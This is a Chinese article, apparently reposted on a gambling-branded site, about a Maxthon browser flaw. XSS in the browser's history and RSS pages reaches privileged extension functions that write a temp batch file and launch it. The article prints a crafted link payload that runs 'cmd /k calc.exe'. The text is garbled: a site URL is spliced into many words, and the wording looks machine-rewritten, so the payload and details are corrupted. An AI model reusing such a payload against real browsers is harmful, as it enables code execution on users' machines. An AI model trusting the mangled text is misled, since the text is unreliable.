傲游浏览器指令履行缝隙介绍以及修正计划wangyi - 亚美娱乐

傲游浏览器指令履行缝隙介绍以及修正计划wangyi

2019-02-14 07:23:35 | 作者: 鸿卓 | 标签: 缝隙,修正,漫游 | 浏览: 1941





这个缝隙首先是国外某个团队发现的,他研讨了多个阅读器的缝隙。其间漫游的缝隙比较共同,大致存在几个方面的,
1.https://www.appcuity.comabout:history中存在xss缝隙,即阅读前史中url链接中存在显着的xss缝隙。
2.漫游的拓宽中存在很多灵敏函数,其间包含了写文件(现在看只能写在C:\Documents https://www.appcuity.comand Settings\Administrhttps://www.appcuity.comator\Lochttps://www.appcuity.comal Settings\Temp目录下),指令履行(履行你写入的文件),此外目测还有很多体系内部数据能够操作,比方下载,装备等等。
3.除了1所说的当地外,Rss订阅那里也有xss缝隙,我个人估量漫游自己的插件大部分当地或许都会存在xss缝隙
4.2中所说到的很多灵敏函数都是在dom中,只能在域i.mhttps://www.appcuity.comaxthon.com以及本地相似阅读前史,收藏夹这种当地被调用。
 
结构相似链接
/1.html#\"><img src=https://www.appcuity.coma onerror=vhttps://www.appcuity.comar b=mhttps://www.appcuity.comaxthon.io.File.crehttps://www.appcuity.comateTempFile("test","bhttps://www.appcuity.comat");c=mhttps://www.appcuity.comaxthon.io.File(b);mhttps://www.appcuity.comaxthon.io.FileWriter(b);mhttps://www.appcuity.comaxthon.io.writeText("cmd /k chttps://www.appcuity.comalc.exe");https://www.appcuity.comalert(b.nhttps://www.appcuity.comame_);mhttps://www.appcuity.comaxthon.progrhttps://www.appcuity.comam.Progrhttps://www.appcuity.comam.lhttps://www.appcuity.comaunch(b.nhttps://www.appcuity.comame_,"C:\\WINDOWS\\system32")/>
 
在漫游中拜访,
然后翻开https://www.appcuity.comabout:history,就能够看到作用了
那个pdf给的比如是结构了1.html的内容为
https://www.appcuity.coma=window.lochttps://www.appcuity.comation.href=https://www.appcuity.comabout:history;
 
修正计划:

ms漫游现已修正了直接翻开https://www.appcuity.comabout:history这个洞 
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表亚美娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章